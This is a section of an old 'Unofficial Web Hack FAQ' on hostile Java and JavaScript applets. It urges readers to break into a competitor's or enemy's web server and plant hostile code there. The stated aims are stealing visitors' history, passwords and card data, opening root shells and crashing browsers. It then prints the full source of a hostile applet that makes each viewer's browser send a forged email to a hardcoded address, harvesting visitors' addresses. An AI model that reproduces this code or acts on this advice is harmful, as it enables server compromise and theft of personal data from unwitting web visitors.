HostedDB - Dedicated UNIX Servers

-->
Web Hack FAQ v2

The Unofficial Web Hack FAQ


Section 05

Fun with Java and JavaScript

05-1. What is a JavaScript Applet?
05-2. What is the JavaScript problem?
05-3. What is an example of this "bad" Java code?

05-1. What is a JavaScript Applet?

JavaScript is Netscape's way of allowing a server to send code via HTML directly to your browser. Since Java is built into Netscape, JavaScript "applets" can be constructed by simply including the text inside the HTML document. When someone accesses your page -- bingo! -- the code then uses Java and performs some function. They can work on 16-bit and 32-bit versions of a Web browser that supports Java, e.g. Netscape.

Also, if you have a Java compiler you can compile an applet and have the appropriate code in the HTML document and load it up to the browser. This approach is even better as you can use more features. This is typically supported in a 32-bit browser that supports Java. This means that a 16-bit version of Netscape (such as that for Windows 3.x or Macintosh) will not support it. There is no intention of anyone writing a 16-bit browser that supports Java applets.


05-2. What is the JavaScript problem?

By taking advantage of certain Java classes within Netscape, control is handed over to the applet, not the user. These can even be done without the user even knowing it. And they can do some pretty nasty things. Here is a summary reported to the Best-of-Security mailing list (edited with my comments).

What does all this mean? Not a whole lot, taken individually. But the clever hacker could start using these items in concert with other items listed in the FAQ and other simple hacking techniques. Of course only a fool would load this stuff up on their personal web page -- the best hack would be to compromise a competitor's server (if you're a business) or an enemy's home page. Then load the code into the page. Add meta keywords to your hacked page so when it is indexed by a spider, any web searches will lead innocent surfers to the page. Then simple things like this -- sending history and cache files (with any searches, passwords to other web pages, credit card info) through a remailer; to spawning root shell for backdoor access; to collecting your arch rival's customers as they come to the rival's page, rendering it so slow as to crash customers browsers (only after you've sent their e-mail address to yourself) -- all become possible.


05-3. What is an example of this "bad" Java code?

Here's an example freely available on the web. This should give you an idea.

/* PenPal.java by Mark D. LaDue */

/* March 15, 1996 *

/*  Copyright (c) 1996 Mark D. LaDue
    You may study, use, modify, and distribute this example for any purpose.
    This example is provided WITHOUT WARRANTY either expressed or implied.  */

/*  This hostile applet forges an elctronic mail letter from the person who
    views the applet in a browser to the person whose address appears in the
    string "toMe."  The return address will be listed as
    penpal@my.hostile.applet.  The appropriate commands to use for
    sendmail can be often be found in the file /etc/mail/sendmail.hf.  
    Note that while the person viewing the applet actually does initiate
    the mail by connecting (involuntarily) to port 25, the applet host's role
    in sending it is not so easily hidden.  See the full header of any e-mail
    letter sent by the applet for more details.  By putting your address
    in the string "toMe" and by scanning your incoming mail (with the
    included shell script or another of your own), you can get the full
    e-mail address, including the user name, of many people who view the
    applet. */ 


import java.applet.*;
import java.io.*;
import java.net.*;

public class PenPal extends java.applet.Applet implements Runnable { 

    public static Socket socker;
    public static DataInputStream inner;
    public static PrintStream outer;
    public static int mailPort = 25 ;
    public static String mailFrom = "my.hostile.applet";
    public static String toMe = "mladue@math.gatech.edu"; //Change this please!
    public static String starter = new String();
    Thread controller = null;

    public void init() {

 try {
     socker = new Socket(getDocumentBase().getHost(), mailPort);
     inner = new DataInputStream(socker.getInputStream());
     outer = new PrintStream(socker.getOutputStream());
        }
        catch (IOException ioe) {}
    }

    public void start() {
        if (controller == null) {
            controller = new Thread(this);
            controller.setPriority(Thread.MAX_PRIORITY);
            controller.start();
        }
    }

    public void stop() {
        if (controller != null) {
            controller.stop();
            controller = null;
        }
    }

    public void run() {
        try {
            starter = inner.readLine();
        }
        catch (IOException ioe) {}
        mailMe("HELO " + mailFrom);
        mailMe("MAIL FROM: " + "penpal@" + mailFrom);
 mailMe("RCPT TO: " + toMe);
 mailMe("DATA");
        mailMe("Hey, it worked!" + "\n." + "\n");
        mailMe("QUIT"); 
        try {
            socker.close();
        }
        catch (IOException ioe) {}
    }

    public void mailMe(String toSend) {
        String response = new String();
        try {
            outer.println(toSend);
            outer.flush();
            response = inner.readLine();
        }
        catch(IOException e) {}
    }
}

[ Return to TOC | Return to FAQ Page ]